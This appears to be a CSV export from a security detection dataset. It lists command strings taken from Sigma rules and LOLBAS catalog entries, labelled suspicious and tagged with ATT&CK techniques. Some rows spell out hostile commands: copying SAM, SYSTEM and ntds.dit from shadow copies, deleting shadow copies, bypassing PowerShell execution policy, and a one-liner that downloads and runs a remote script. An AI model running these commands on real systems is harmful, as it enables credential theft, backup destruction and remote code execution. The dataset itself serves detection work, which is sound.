504a1b3ca6b1e531e787383b,*rar.exe,*rar.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_compression_params.yml,Potentially Suspicious Compression Tool Parameters,process_creation,"[""attack.collection"", ""attack.t1560.001"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 523768eaf7040a556813b7e7,7z*.exe,7z*.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_compression_params.yml,Potentially Suspicious Compression Tool Parameters,process_creation,"[""attack.collection"", ""attack.t1560.001"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a497b58c0b12bccf6a7a906e,C:\Windows\SysWOW64\msiexec.exe,C:\Windows\SysWOW64\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml,Potential Suspicious Execution From GUID Like Folder Names,process_creation,"[""attack.defense-evasion"", ""attack.t1027"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bc36ea151c625f5c98031934,C:\Windows\System32\drvinst.exe,C:\Windows\System32\drvinst.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml,Potential Suspicious Execution From GUID Like Folder Names,process_creation,"[""attack.defense-evasion"", ""attack.t1027"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0395d21a13cdcb4c2eb402e0,C:\Windows\System32\msiexec.exe,C:\Windows\System32\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml,Potential Suspicious Execution From GUID Like Folder Names,process_creation,"[""attack.defense-evasion"", ""attack.t1027"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b3f4acfb6d048535ddcf30ed,C:\Program Files\GPSoftware\Directory Opus\dopus.exe,C:\Program Files\GPSoftware\Directory Opus\dopus.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml,Use Short Name Path in Command Line,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e7df3ae2dc6a44a741e95d9b,C:\Windows\System32\Dism.exe,C:\Windows\System32\Dism.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml,Use Short Name Path in Command Line,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f41fe4c07a58a6cbe405862a,C:\Windows\System32\cleanmgr.exe,C:\Windows\System32\cleanmgr.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml,Use Short Name Path in Command Line,process_creation,"[""attack.defense-evasion"", ""attack.t1564.004"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7418f180ef754b7945af700a,Cmd.Exe,Cmd.Exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 826b58920d211a71966ed39f,CompatTelRunner.exe,CompatTelRunner.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b16a7bc0c1cdbe6a08cb4d8f,Discord.exe,Discord.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 11c72d4c5d01a2ae69c16fe5,EXPLORER.EXE,EXPLORER.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e517b5b82b1c3c1db1115a72,IE4UINIT.EXE,IE4UINIT.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ff6bad260d36b38c634722d1,MpCmdRun.exe,MpCmdRun.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 14ea8f4a2bd8d5b5331ce165,NGenTask.exe,NGenTask.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 51356995f487e994d5799599,OneDriveSetup.exe,OneDriveSetup.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9aa8a12b9b8d1e5f2f681734,PowerShell.EXE,PowerShell.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 591dda6b5f6a67f1e22291bf,REGSVR32.EXE,REGSVR32.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fc2d44e69d600a29ee26baec,Spotify.exe,Spotify.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ce0bda7ef1c04cd3fa42eeec,electron.exe,electron.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 67bd13d9539ff95e6a730e78,httpd.exe,httpd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ae7ea86d76ae2ba21df7d0e,mmc.exe,mmc.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 58009dce52e0323491c8f650,mscorsvw.exe,mscorsvw.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 862bf0c5bf3659b82440171b,msiexec.exe,msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3eccf1c966256974bff8c389,smss.exe,smss.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml,Potential Executable Run Itself As Sacrificial Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055"", ""detection.threat-hunting""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 741922a6229024480e487509,sc stop KSCWebConsoleMessageQueue,sc stop KSCWebConsoleMessageQueue,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_service_stop.yml,Stop Windows Service,process_creation,"[""attack.impact"", ""attack.t1489""]",windows,0.6,True,Sigma process_creation rule; status=deprecated; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b683bab7e67284c6390e31e2,sc stop LGHUBUpdaterService,sc stop LGHUBUpdaterService,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_service_stop.yml,Stop Windows Service,process_creation,"[""attack.impact"", ""attack.t1489""]",windows,0.6,True,Sigma process_creation rule; status=deprecated; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 07ab0c662ac5da35ba05e84d,C:\Windows\PSEXESVC.exe,C:\Windows\PSEXESVC.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_sysinternals_psexesvc_start.yml,PsExec Service Start,process_creation,"[""attack.execution"", ""attack.s0029"", ""attack.t1569.002""]",windows,0.6,True,Sigma process_creation rule; status=deprecated; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 99eae15dce99c939741e68e5,C:\Windows\System32\mshta.exe,C:\Windows\System32\mshta.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml,Lazarus Activity Apr21,process_creation,"[""attack.g0032"", ""attack.execution"", ""attack.t1106""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 959064228a8ab3975e536f1c,C:\Windows\System32\rundll32.exe,C:\Windows\System32\rundll32.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml,Lazarus Activity Apr21,process_creation,"[""attack.g0032"", ""attack.execution"", ""attack.t1106""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b9f1f5a593806dca122443d6,C:\Windows\System32\wbem\wmiprvse.exe,C:\Windows\System32\wbem\wmiprvse.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml,Lazarus Activity Apr21,process_creation,"[""attack.g0032"", ""attack.execution"", ""attack.t1106""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2dc93565df219fc675175d15,copy \\?\GLOBALROOT\Device\\*\config\SAM,copy \\?\GLOBALROOT\Device\\*\config\SAM,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b42a828e815524894bb5a816,copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit,copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a04e82ade6403d2d4f3e8f38,esentutl.exe /y /vss *\SAM,esentutl.exe /y /vss *\SAM,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9302a3cdc4c2c217a954e97d,esentutl.exe /y /vss *\SYSTEM,esentutl.exe /y /vss *\SYSTEM,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3e97cc6deb97955e4ba44ad2,esentutl.exe /y /vss *\ntds.dit*,esentutl.exe /y /vss *\ntds.dit*,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 06a177568c6f3782679e06c2,reg SAVE HKLM\SYSTEM,reg SAVE HKLM\SYSTEM,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 84347e91aa8fbe8cddf39f17,vssadmin create shadow /for=C:,vssadmin create shadow /for=C:,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0914e9a5a10f0a745b0d133f,vssadmin delete shadows /for=C:,vssadmin delete shadows /for=C:,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ceef72470374230b0a0d203c,vssadmin.exe Delete Shadows,vssadmin.exe Delete Shadows,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/win_susp_vssadmin_ntds_activity.yml,Activity Related to NTDS.dit Domain Hash Retrieval,process_creation,"[""attack.credential_access"", ""attack.t1003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 67ed3d7825ca4f05016ce952,RUNDLL32.EXE,RUNDLL32.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_renamed_rundll32.yml,Renamed Rundll32.exe Execution,process_creation,[],windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f2370f1662e1ad2ed8ec4c10,C:\Program Files\Box\Box\FS\streem.exe,C:\Program Files\Box\Box\FS\streem.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,deprecated/windows/proc_creation_win_regsvr32_anomalies.yml,Regsvr32 Anomaly,process_creation,"[""attack.defense_evasion"", ""attack.t1218.010"", ""car.2019-04-002"", ""car.2019-04-003""]",windows,0.7,True,Sigma process_creation rule; status=deprecated; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f7c9aee99b987fec4cf5d064,\cmd.exe,\cmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,unsupported/windows/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml,MSI Spawned Cmd and Powershell Spawned Processes,process_creation,"[""attack.privilege_escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=unsupported; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c833fd4ec2a36fa64dfc6e05,\powershell.exe,\powershell.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,unsupported/windows/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml,MSI Spawned Cmd and Powershell Spawned Processes,process_creation,"[""attack.privilege_escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=unsupported; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fd29a8bba6c03d2e53c17018,net session,net session,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,unsupported/windows/proc_creation_win_correlation_apt_turla_commands_medium.yml,Automated Turla Group Lateral Movement,process_creation,"[""attack.g0010"", ""attack.execution"", ""attack.t1059"", ""attack.lateral_movement"", ""attack.t1021.002"", ""attack.discovery"", ""attack.t1083"", ""attack.t1135""]",windows,0.6,True,Sigma process_creation rule; status=unsupported; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1d6ddc7803fe66e4b9023c58,net share,net share,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,unsupported/windows/proc_creation_win_correlation_apt_turla_commands_medium.yml,Automated Turla Group Lateral Movement,process_creation,"[""attack.g0010"", ""attack.execution"", ""attack.t1059"", ""attack.lateral_movement"", ""attack.t1021.002"", ""attack.discovery"", ""attack.t1083"", ""attack.t1135""]",windows,0.6,True,Sigma process_creation rule; status=unsupported; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f35de237c6e17d462e95a1a9,net view /DOMAIN,net view /DOMAIN,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,unsupported/windows/proc_creation_win_correlation_apt_turla_commands_medium.yml,Automated Turla Group Lateral Movement,process_creation,"[""attack.g0010"", ""attack.execution"", ""attack.t1059"", ""attack.lateral_movement"", ""attack.t1021.002"", ""attack.discovery"", ""attack.t1083"", ""attack.t1135""]",windows,0.6,True,Sigma process_creation rule; status=unsupported; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 01767a6a4bb5bf51cd4bd47c,The command,The command,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,YML-Template.yml,Binary.exe,Execute,"[""T1055"", {""Key1"": ""Value1""}]","Windows 10 1803, Windows 10 1703",0.85,False,Description of the command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fee3a55764f41fa188daa433,The second command,The second command,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,YML-Template.yml,Binary.exe,AWL Bypass,"[""T1033""]",Windows 10 All,0.85,False,Description of the second command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7ec9d09c6661b625ba519020,"C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe ""URL"" ""DESTINATION FILE""","C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe ""URL"" ""DESTINATION FILE""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/HonorableMentions/GfxDownloadWrapper.yml,GfxDownloadWrapper.exe,Download,"[""T1105""]",Windows 10,0.85,False,"GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by ""Microsoft Windows Hardware"", ""Compatibility Publisher"", ""Microsoft Windows Third Party Component CA 2012"", ""Microsoft Time-Stamp PCA 2010"", ""Microsoft Time-Stamp Service"".",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5277435f378ca86079bbe294,powershell.exe -ep bypass -file c:\path\to\a\script.ps1,powershell.exe -ep bypass -file c:\path\to\a\script.ps1,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/HonorableMentions/PowerShell.yml,Powershell.exe,Execute,"[""T1059.001""]",Windows 7 and up,0.85,False,Set the execution policy to bypass and execute a PowerShell script without warning,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9bd9be0cee893ac7be194db5,"powershell.exe -ep bypass -command ""Invoke-AllTheThings...""","powershell.exe -ep bypass -command ""Invoke-AllTheThings...""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/HonorableMentions/PowerShell.yml,Powershell.exe,Execute,"[""T1059.001""]",Windows 7 and up,0.85,False,Set the execution policy to bypass and execute a PowerShell command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 553f21007225ee83583774e8,powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA==,powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA==,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/HonorableMentions/PowerShell.yml,Powershell.exe,Execute,"[""T1059.001""]",Windows 7 and up,0.85,False,Set the execution policy to bypass and execute a very malicious PowerShell encoded command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3395eaf6cf9f63d2bb4302f3,"code.exe tunnel --accept-server-license-terms --name ""tunnel-name""","code.exe tunnel --accept-server-license-terms --name ""tunnel-name""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/HonorableMentions/Code.yml,code.exe,Execute,"[""T1219.001""]","Windows 10, Windows 11",0.85,False,Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2a0e9769b399d9db490a68d3,. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1},. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/CL_mutexverifiers.yml,CL_Mutexverifiers.ps1,Execute,"[""T1216"", {""Execute"": ""PowerShell""}]",Windows 10,0.85,False,Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e2a4a869a7c2bd58e65e62f7,"SyncAppvPublishingServer.vbs ""n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX""","SyncAppvPublishingServer.vbs ""n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Syncappvpublishingserver.yml,Syncappvpublishingserver.vbs,Execute,"[""T1216.002"", {""Execute"": ""PowerShell""}]","Windows 10, Windows 11",0.85,False,Inject PowerShell script code with the provided arguments,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7d31a335540834de4c098a7a,"Pester.bat [/help|?|-?|/?] ""$null; {CMD}""","Pester.bat [/help|?|-?|/?] ""$null; {CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/pester.yml,Pester.bat,Execute,"[""T1216"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Execute code using Pester. The third parameter can be anything. The fourth is the payload.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33c3e73f366e0bd0c79f55e3,Pester.bat ;{PATH:.exe},Pester.bat ;{PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/pester.yml,Pester.bat,Execute,"[""T1216"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Execute code using Pester. Example here executes specified executable.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a0cacd4c56daf48d8e08bd23,. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD},. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Cl_invocation.yml,CL_Invocation.ps1,Execute,"[""T1216"", {""Execute"": ""CMD""}]",Windows 10,0.85,False,Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an 